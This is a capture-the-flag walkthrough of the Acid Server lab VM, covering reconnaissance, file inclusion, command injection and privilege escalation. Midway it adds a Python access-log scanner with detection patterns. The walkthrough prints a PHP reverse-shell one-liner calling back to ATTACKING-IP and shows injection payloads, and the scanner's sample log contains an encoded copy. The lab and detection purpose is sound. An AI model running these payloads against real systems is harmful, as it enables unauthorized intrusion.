Acid Server is a web-based vulnerable virtual machine designed as a CTF (Capture The Flag) for pentesters. If you are interested in web-based exploits, then you are in the right place. The description of Acid Server on Vulnhub is as follows:
Welcome to the world of Acid.
Fairy tales use secret keys to open the magical doors.
CTF Goal :
Boot2Root (Gain root access)
Requirements :
- VMware or VirtualBox
- Knowledge of webshells
- Internet connection (for googling)
Step 1 :
First of all, we don't know the IP of the Acid server, so we use the utility called netdiscover.
From netdiscover we learn that the IP of the Acid server is 192.168.207.129.
Step 2 :
Now let's scan all the ports of this machine (this takes a lot of time, so a little advice: run it and have a cup of coffee).
(Oh! the coffee was great.) Looks like it took 6250 seconds.
The nmap results show that port 33447 is open with an http service.
Step 3 :
Now let's open it in a browser.
The server's home page is shown with a directory path in the title.
If we view the source of this page, we get the 1st flag.
Step 4 :
Now let's go to the path mentioned in the title (http://192.168.207.129:33447/Challenge/); we get the following page.
Oops!!! We don't know the email or the password. What should we do? Let's ask the developers 🙂 They are a big help in understanding the code.
First of all, let's go to the source code of the page.
Now that we have the name of the creators (peredur.net), let's start googling it. We get a GitHub page of the company/creators. If we read the GitHub page, we find a dummy email and password.
Let's try the dummy email and password on the login page, and we get a successful login.
Step 5 :
Let's proceed further. When we click "Click Here to Proceed Further", we land on the following page.
It asks for a file name, so we can view any file we want (as long as it is readable by www-data). The most useful thing is to know the list of users present on the system, so let's hunt for the passwd file.
When we give the path of the passwd file we get "nothing". Don't get confused here!!
Yoooo!!!! We got two useful usernames: acid and saman.
Step 6 :
Now that we are done with the include page, let's enumerate more files and folders in the current folder, i.e., Challenge.
Here we would use the tool provided by OWASP called DirBuster.
Note :- DirBuster is very noisy.
This also takes quite a while, so let's go and listen to a song, one of my favorites (it's a Japanese song): Binks' Sake.
Looks like we got some results.
So, let's move on to cake.php, where we get the following page.
If we look carefully at the title of this page, we see a new path, /Magic_Box. But sadly it's inaccessible.
Step 7 :
Looks like DirBuster raided the directory and gave us some very nice results.
Let's check the command.php page.
Yoooohhhoooo!!!! Great page, right? This page is a jackpot for hackers. Let's play some old school tricks.
The result is hidden in plain view.
Yupee!! It's injectable. So let's try creating a reverse shell using PHP. We can find one on Google by searching for "one line simple php reverse shell". Well, I tried many snippets, but the best was:
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Before running it through the webshell, we use the Swiss army knife, netcat, to listen on the attacker's machine.
Now lets start the webshell.
We would get a reverse connection on our listening port of netcat (if everything is correctly filled).
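On the defender's side, the two requests used in Step 5 (reading /etc/passwd through the file parameter) and Step 7 (shell metacharacters injected into command.php) leave clear traces in the web server's access log. The following Python scanner is an added example, not code from the original post; the log lines, the include.php path and the ip parameter name are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines (not from the original post). The
# paths, parameter names, client IP and timestamps are assumptions.
SAMPLE_LOG = """\
192.168.207.1 - - [01/Jan/2016:10:00:01 +0000] "GET /Challenge/ HTTP/1.1" 200 512
192.168.207.1 - - [01/Jan/2016:10:00:05 +0000] "GET /Challenge/include.php?file=/etc/passwd HTTP/1.1" 200 1843
192.168.207.1 - - [01/Jan/2016:10:00:09 +0000] "GET /Challenge/cake.php HTTP/1.1" 200 301
192.168.207.1 - - [01/Jan/2016:10:00:15 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1%3Bid HTTP/1.1" 200 77
192.168.207.1 - - [01/Jan/2016:10:00:20 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1%3Bphp+-r+%27%24sock%3Dfsockopen%28%22192.168.207.1%22%2C80%29%3B%27 HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators for the two techniques in the walkthrough: local files pulled in
# through an include parameter, and shell command injection.
LFI_RE = re.compile(r"(\.\./|^/etc/|^/proc/|passwd|shadow)")
CMDI_RE = re.compile(r"(;|\|\||\||&&|`|\$\(|/bin/sh|fsockopen)")


def classify_value(value):
    """Return a category for one decoded parameter value, or None if benign."""
    if CMDI_RE.search(value):
        return "command-injection"
    if LFI_RE.search(value):
        return "file-inclusion"
    return None


def scan_log(text):
    """Return (line_no, category, path, param, value) for suspicious requests."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl splits on the raw query first and only then percent-decodes,
        # so an encoded ';' (%3B) is inspected as ';' without breaking the pair.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            category = classify_value(value)
            if category:
                findings.append((line_no, category, parts.path, param, value))
    return findings


if __name__ == "__main__":
    for line_no, category, path, param, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {category} in {path} ({param}={value!r})")
```

Run against a real access log, the same function reports the decoded value, so a percent-encoded payload is not missed by a plain text search for ";".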
Now let's get a TTY shell by using the following command.
python -c 'import pty; pty.spawn("/bin/bash")'
Now, finally, we need root access. So let's look for something that helps us gain root, like sudo users. Let's see if we can change user (we already know who the users on this system are).
Nice, we can change user. As we don't know the password, let's search for it. Where can we find the user's password? Let's play around for a while.
First let's see what files are present on the system and find some suspicious ones (files that should not be present on a Linux system).
Well, in root (/) we find s.bin to be suspicious; let's check it out.
Oh! We found something: investigate.php. Let's see what it has to say.
Nice, let's become an investigator and check out the other culprit files. Let's check what is present in the original sbin.
In sbin, raw_vs_isi looks different. What is it? Let's check it out.
Oh! We found a hint. What is in the .pcapng? What should we do? Let's run strings on it.
This is creepy! "saman and now a days he's ... 1337hax0r". We know that saman is the user, so what is 1337hax0r? Let's try it as a password.
Nice, it works!!! Now we just need to escalate privileges.
Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho
Binkusu no sake wo, todoke ni yuku yo ……
I hope you enjoyed the journey and leave some comments.
Original article link ( ^_^ ), decode it~~ : aHR0cHM6Ly9zZWN1cmV5b3VyZGlnaXRhbGxpZmUuaW4vYWNpZC1zZXJ2ZXItdm0td2Fsa3Rocm91Z2gv